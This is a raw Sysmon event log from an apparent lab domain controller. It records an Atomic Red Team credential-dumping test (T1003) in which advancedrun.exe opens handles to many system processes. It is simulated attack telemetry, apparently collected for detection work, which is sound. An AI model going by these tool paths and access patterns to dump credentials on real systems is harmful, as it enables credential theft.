 AUTHORITY\SYSTEM 10341000x80000000000000003942685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003942684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
